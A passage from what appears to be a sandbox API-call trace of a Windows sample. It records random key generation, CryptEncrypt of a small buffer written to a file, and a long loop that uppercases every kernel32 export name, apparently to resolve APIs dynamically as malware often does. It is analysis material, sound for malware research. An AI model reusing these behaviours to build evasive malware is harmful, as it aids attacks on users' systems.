dwMaximumSizeLow=0x0, lpName=0x0) returned 0x258 [0185.961] MapViewOfFile (hFileMappingObject=0x258, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.961] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.961] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.961] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.962] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe688*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe688*=0x100) returned 1 [0185.962] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.963] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.963] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.963] CloseHandle (hObject=0x258) returned 1 [0185.963] SetFilePointerEx (in: hFile=0x254, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.963] WriteFile (in: hFile=0x254, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe6a8, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe6a8*=0x108, lpOverlapped=0x0) returned 1 [0185.964] CloseHandle (hObject=0x0) returned 0 [0185.964] CloseHandle (hObject=0x254) returned 1 [0185.964] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.964] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.965] GetTickCount () returned 0x1135ba8 [0185.965] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.965] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.965] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.965] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.965] lstrlenA (lpString="kernel32.dll") returned 12 [0185.966] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.966] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.966] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.966] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.966] lstrlenA (lpString="ADDATOMA") returned 8 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.966] lstrlenA (lpString="ADDATOMW") returned 8 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.966] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.966] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.966] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.966] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.966] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.966] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.966] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.966] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.966] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.966] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0185.966] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0185.966] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0185.967] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0185.967] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0185.967] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0185.967] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0185.967] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0185.967] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0185.967] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0185.967] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0185.967] lstrlenA (lpString="BACKUPREAD") returned 10 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0185.967] lstrlenA (lpString="BACKUPSEEK") returned 10 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0185.967] lstrlenA (lpString="BACKUPWRITE") returned 11 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0185.967] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0185.967] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0185.967] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0185.967] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0185.967] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0185.967] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0185.967] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0185.967] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0185.967] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0185.968] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0185.968] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0185.968] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0185.968] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0185.968] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0185.968] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0185.968] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0185.968] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0185.968] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0185.968] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0185.968] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0185.968] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0185.968] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0185.968] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0185.968] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0185.968] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0185.968] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0185.968] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0185.968] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0185.969] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0185.969] lstrlenA (lpString="BEEP") returned 4 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0185.969] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0185.969] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0185.969] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0185.969] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0185.969] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0185.969] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0185.969] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0185.969] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0185.969] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0185.969] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0185.969] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0185.969] lstrlenA (lpString="CANCELIO") returned 8 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0185.969] lstrlenA (lpString="CANCELIOEX") returned 10 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0185.969] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0185.969] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0185.969] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0185.969] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0185.970] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0185.970] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0185.970] lstrlenA (lpString="CHECKELEVATION") returned 14 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0185.970] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0185.970] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0185.970] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0185.970] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0185.970] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0185.970] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0185.970] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0185.970] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0185.970] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0185.970] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0185.970] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0185.970] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0185.970] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0185.970] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0185.970] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0185.970] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0185.970] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0185.971] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0185.971] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0185.971] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0185.971] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0185.971] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0185.971] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0185.971] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0185.971] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0185.971] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0185.971] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0185.971] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0185.971] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0185.971] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0185.971] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0185.971] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0185.971] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0185.971] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0185.971] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0185.971] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0185.972] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0185.972] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0185.972] lstrcpyA (in: lpString1=0x36fda9c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0185.972] lstrlenA 